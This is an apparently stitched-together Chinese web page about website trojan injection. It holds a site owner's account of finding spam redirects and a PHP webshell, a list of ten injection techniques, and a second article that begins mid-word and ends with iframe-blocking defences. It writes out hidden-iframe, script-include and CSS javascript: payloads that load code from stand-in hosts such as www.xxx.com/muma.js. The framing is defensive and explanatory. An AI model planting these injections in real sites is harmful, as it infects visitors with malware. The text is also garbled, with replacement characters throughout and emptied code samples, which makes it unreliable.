淺析網(wǎng)站被掛馬的代碼
言:
其實(shí)我網(wǎng)站中馬應(yīng)該可以追溯到去年的八月份,當(dāng)時(shí)好像是在 xx 平臺(tái)有用戶給我留言說(shuō)網(wǎng)站上的游戲進(jìn)不去了 (五子棋多人聯(lián)機(jī))�����。于是我打開(kāi)一看發(fā)現(xiàn)首頁(yè)被靜態(tài)化了�����,為了快速訪問(wèn)就重新提交了入口文件也沒(méi)繼續(xù)理會(huì)。
直到后來(lái),隔一段時(shí)間就又有人留言說(shuō)打不開(kāi)�����,我才開(kāi)始排查起因了�����。進(jìn)入項(xiàng)目代碼里�����,我發(fā)現(xiàn)有些文件被修改了。另一方面呢�����,網(wǎng)站的收錄也在不斷變少�����,甚至搜索出來(lái)的詞和描述都變了�����,有賭博的�����,也有體育�����,迷彩之類的,我猜測(cè)應(yīng)該是中馬了�����。
但是有一點(diǎn)想不通�����,這人是不是閑得無(wú)聊�����。網(wǎng)站上除了技術(shù)類文章,還有一些 H5 單機(jī)游戲�����,資源城和多人聯(lián)機(jī)游戲由于沒(méi)有其他收入支撐�����,到期后就關(guān)閉了�����。剩下的就是一些免費(fèi)使用的小工具了�����,有必要在我網(wǎng)站上掛馬嗎�����,帶著這個(gè)疑問(wèn)就全都排查了一下代碼�����,終于找到了兩個(gè)文件能解釋這個(gè)問(wèn)題了。
文件一�����,篡改的入口文件:
他是直接拿靜態(tài)化的首頁(yè)加了一些腳本放在了入口文件上�����,導(dǎo)致我導(dǎo)航欄的跳轉(zhuǎn)全部失效�����,以下就是我截取的部分文件代碼,再說(shuō)明一下里面放了什么�����。
1. TDK 部分
也就是標(biāo)題�����,描述和關(guān)鍵詞都改了,就是上面的模樣經(jīng)過(guò) ascii 編碼,可以通過(guò)腳本之家的工具 ascii 轉(zhuǎn)中文查看�����。他改的大概都是一些體育�����,迷彩之類的詞�����,這也就解釋了為什么網(wǎng)站的搜索詞都變了,因?yàn)闆](méi)有跳轉(zhuǎn)收錄也就變少了。
2. JavaScript 部分
Js 主要是下面那一長(zhǎng)串?dāng)?shù)字�����,是 unicode 編碼了�����。我一個(gè)數(shù)字一個(gè)數(shù)字轉(zhuǎn)完之后�����,發(fā)現(xiàn)原來(lái)是一個(gè) Js 腳本引入,最后 ducument.write 就是每次進(jìn)入都引入腳本,腳本如下�����。
原來(lái)是給他的網(wǎng)站做引流�����,所以我也打開(kāi)了他網(wǎng)站,就是下面這個(gè)�����。
文件二�����,PHP 大馬:
這個(gè)文件就是他們掛上去的�����,可能是之前通過(guò)留言表單的 bug 提交的�����,文件名 dama.php,網(wǎng)絡(luò)上搜索應(yīng)該就可以了解到,代碼如下:
\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65 像這個(gè)是十六進(jìn)制,可以通過(guò) JS 的 console.log 或 alert 顯示出來(lái)�����,其實(shí)就是 base64_deocde 函數(shù)名�����,而 \nc\n3\nR\ny\nX\n3\nJ\nv\nd\nD\nE\nz\n 同樣打印出來(lái)是如下一串換行的字母�����,所以就是 base64_decode () 那串�����,解碼后是一個(gè) str_rot13 () 函數(shù)
所以那一串長(zhǎng)長(zhǎng)的就是被 ROT13 編碼了�����,可以通過(guò)以下方式修改,還原出那一串是些什么東西�����,也可以把 dama.php 在本地項(xiàng)目里直接運(yùn)行�����。
運(yùn)行后的樣子如下�����,登陸密碼就是他代碼里的那個(gè) $password, 其實(shí)大概猜的到是 Admin 經(jīng)過(guò) md5 的,登陸后如下�����。
登陸后�����,就可以看到�����,自己網(wǎng)站就如同裸奔�����,他可以任意的提交�����,修改,刪除文件,還可以對(duì)目錄或文件提權(quán)�����,掃描�����,執(zhí)行命令等等功能�����。最后通過(guò)我修改后�����,近幾日網(wǎng)站沒(méi)有再出現(xiàn)之前的問(wèn)題了。以上文件僅作提示�����,所以關(guān)于如何修改和那個(gè)大馬如何使用就不做介紹了�����。
幾天勒索病毒就瘋了,其實(shí)最關(guān)鍵的還是用戶沒(méi)有很好的更新自己的電腦,才能讓黑客有機(jī)可乘。。�����。在此分享十種掛馬的方式�����,BUT�����!掛出來(lái)不是讓你去破壞別人的網(wǎng)站,而是讓你能做到有備無(wú)患。
一:框架掛馬
//說(shuō)明:檢查src的地址是否有問(wèn)題。
////////////////////代碼如下////////////////////
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
//說(shuō)明:這個(gè)地址是js代碼訪問(wèn)的文件地址�����,一般是模仿你的js文件而設(shè)�����。
////////////////////代碼如下////////////////////
document.write(“<iframe width='0' height='0' src=‘地址'></iframe>”);
保存為xxx.js�����,則JS掛馬代碼為
//說(shuō)明:運(yùn)行你的js文件
////////////////////代碼如下////////////////////
<script language=javascript src=xxx.js></script>
三:js變形加密
//說(shuō)明:運(yùn)行后綴發(fā)生了變化,本質(zhì)是一樣的。
////////////////////代碼如下////////////////////
<SCRIPT language=“JScript.Encode” src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴 電腦知識(shí)
四:body掛馬
//說(shuō)明:略
////////////////////代碼如下////////////////////
<body ></body>
五:隱蔽掛馬
//說(shuō)明:略
////////////////////代碼如下////////////////////
top.document.body.innerHTML=top.document.body.innerHTML + ' <iframe src=“http://www.xxx.com/muma.htm/”></iframe>';
六:CSS中掛馬
//說(shuō)明:背景中鏈接用的js調(diào)用�����。
////////////////////代碼如下////////////////////
body {
background-image: url('javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}
七:JAJA掛馬
////////////////////代碼如下////////////////////
<SCRIPT language=javascript>
window.open (“地 址”,“”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1”)�����;
</script>
八:圖片偽裝
////////////////////代碼如下////////////////////
<html>
<iframe src=“網(wǎng)馬地址” height=0 width=0></iframe>
<img src=“圖片地址”></center>
</html>
九:偽裝調(diào)用
////////////////////代碼如下////////////////////
<frameset rows=“444,0” cols=“*”>
<frame src=“打開(kāi)網(wǎng)頁(yè)” framborder=“no” scrolling=“auto” noresize marginwidth=“0”margingheight=“0”>
<frame src=“網(wǎng)馬地址” frameborder=“no” scrolling=“no” noresize marginwidth=“0”margingheight=“0”>
</frameset>
十:高級(jí)欺騙
////////////////////代碼如下////////////////////
<a href=“http://www.163.com(迷惑連接地址,顯示這個(gè)地址指向木馬地址)” > 頁(yè)面要顯示的內(nèi)容 </a>
<SCRIPT Language=“JavaScript”>
function www_163_com ()
{
var url=“網(wǎng)馬地址”;
open(url,“NewWindow”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10”)�����;
}
</SCRIPT>
大家還有什么看法或者有更好的預(yù)防方法可以評(píng)論留言(文章來(lái)源:與時(shí)代同行 )
謂的掛馬�����,就是黑客通過(guò)各種手段�����,包括SQL注入,網(wǎng)站敏感文件掃描�����,服務(wù)器漏洞�����,網(wǎng)站程序0day, 等各種方法獲得網(wǎng)站管理員賬號(hào)�����,然后登陸網(wǎng)站后臺(tái)�����,通過(guò)數(shù)據(jù)"庫(kù)備份/恢復(fù)"或者上傳漏洞獲得一個(gè)webshell。利用獲得的webshell修改網(wǎng)站頁(yè)面的內(nèi)容�����,向頁(yè)面中加入惡意轉(zhuǎn)向代碼�����。也可以直接通過(guò)弱口令獲得服務(wù)器或者網(wǎng)站FTP,然后直接對(duì)網(wǎng)站頁(yè)面直接進(jìn)行修改�����。當(dāng)你訪問(wèn)被加入惡意代碼的頁(yè)面時(shí)�����,你就會(huì)自動(dòng)的訪問(wèn)被轉(zhuǎn)向的地址或者下載木馬病毒�����。下面就讓我們來(lái)看看幾種常見(jiàn)的掛馬網(wǎng)站。
(1)iframe 框架掛馬
在網(wǎng)頁(yè)上增加一行掛馬的程序�����,例如:
這種嵌入是的掛馬非常常見(jiàn)�����,在Google中搜索發(fā)現(xiàn)的可能還有木馬的網(wǎng)頁(yè)�����,一般都是被這種方式掛馬�����。這行語(yǔ)句就是在網(wǎng)頁(yè)打開(kāi)的時(shí)候�����,同時(shí)打開(kāi)另外一個(gè)網(wǎng)頁(yè),當(dāng)然這個(gè)網(wǎng)頁(yè)可能包含大量的木馬,也可能僅僅是為了騙取流量�����。
如果我們的網(wǎng)頁(yè)不使用iframe�����,我們可以屏蔽iframe屬性�����,這樣,即使網(wǎng)頁(yè)被iframe掛馬,也不會(huì)傷害到訪問(wèn)網(wǎng)站的用戶�����。
【原理】:
IE5及其以后版本支持在CSS中使用expression�����,用來(lái)把CSS屬性和javascript腳本關(guān)聯(lián)起來(lái)�����,這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。
我們?cè)诰W(wǎng)頁(yè)中增加如下的代碼即可屏蔽iframe屬性:
iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}
iframe 也可以采用加密的方式掛馬�����,例如下面的代碼:
(2)script 掛馬
通過(guò)script的調(diào)用來(lái)掛馬�����,可以掛直接的html文件�����,也可以掛js文件,可以明文掛馬,為了躲避追查,也有加密掛馬的形式�����,形式各異�����,千差萬(wàn)別�����,主要方式如下:
這是一個(gè)加密的掛馬語(yǔ)句;
2.1 htm文件掛馬:
通過(guò)上傳一個(gè)木馬文件(x.htm)掛馬�����,代碼如下:
document.write(“
”)
document.write(“”)
document.write(“”)
htm 掛馬代碼:
2.2 js文件掛馬
通過(guò)上傳一個(gè)木馬文件(x.js)掛馬�����,代碼如下:
document.write(“”);
JS掛馬代碼:
當(dāng)然也可以掛互聯(lián)網(wǎng)上任何一臺(tái)機(jī)器的x.js文件;
2.3 js變形加密
(3)圖片偽裝掛馬
隨著防毒技術(shù)的發(fā)展�����,圖片木馬技術(shù)逃避殺毒監(jiān)視的新技術(shù)�����,攻擊者將類似:http://www.xxx.com/x.htm中的木馬代碼植入到x.gif圖片文
件中�����,這些嵌入代碼的圖片都可以用工具生成。圖片木馬生成后�����,再利用代碼調(diào)用執(zhí)行�����,是比較新穎的一種掛馬隱蔽方法�����,實(shí)例代碼如:
當(dāng)用戶打開(kāi)http://www.x.com/x.htm是,顯示給用戶的是http://www.x.com/x.jpg�����,而http://www.x.com/x.htm網(wǎng)頁(yè)代碼也隨之運(yùn)行�����。
(4)其它的掛馬方式
4.1 body掛馬
也可以在css的body中掛馬
body {
background-image: url(‘javascript:document.write(“”)’)}
4.2 隱蔽掛馬
top.document.body.innerHTML=top.document.body.innerHTML +
‘ ’;
4.3 java的open函數(shù)掛馬
直接調(diào)用:
window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);
欺騙調(diào)用:
頁(yè)面要顯示的內(nèi)容
function www_a_com ()
{
var url=”網(wǎng)馬地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w
idth=800,height=600,left=10,top=10″);
}
4.4 偽裝調(diào)用:
形形色色的網(wǎng)頁(yè)掛馬�����,代碼都十分簡(jiǎn)單,所以�����,互聯(lián)網(wǎng)木馬想要傳播�����,就會(huì)不停的開(kāi)發(fā)新的掛馬方式�����,不停的加密隱藏自己,這樣才能逃過(guò)各種安全軟件的眼睛�����。其實(shí)�����,看看上文�����,很多語(yǔ)句都是編程常用的代碼,只是使用的目的不一樣罷了�����,了解了網(wǎng)頁(yè)掛馬的原理和方法�����,再防范網(wǎng)頁(yè)掛馬就容易多了。
帶木馬的網(wǎng)頁(yè)主要包括兩種類型:一種自己本身就是木馬網(wǎng)站,所有的頁(yè)面都有木馬,另一種是正常的網(wǎng)站�����,由于管理不善�����,被掛馬�����,成為木馬網(wǎng)站的一個(gè)中轉(zhuǎn)站,看看google中這樣的網(wǎng)站何其多,可能很多站長(zhǎng)現(xiàn)在還不知道�����,呵呵�����,多學(xué)習(xí)學(xué)習(xí)吧�����,站長(zhǎng)可不是那么好當(dāng)?shù)摹?/span>
不過(guò),僅僅有了網(wǎng)絡(luò)掛馬的代碼,也不一定一定能傳播木馬�����,只要我們加強(qiáng)防范�����,不讓我們的網(wǎng)頁(yè)被 掛馬�����,甚至,即使被掛馬了�����,打開(kāi)了木馬網(wǎng)頁(yè)�����,我們的系統(tǒng)沒(méi)有漏洞�����,木馬網(wǎng)頁(yè)也同樣不能發(fā)揮作用的。所以,最重要的安全防范方式就是定期給系統(tǒng)打補(bǔ)丁�����,幾乎 所有的木馬網(wǎng)頁(yè)都無(wú)法發(fā)揮作用了�����。
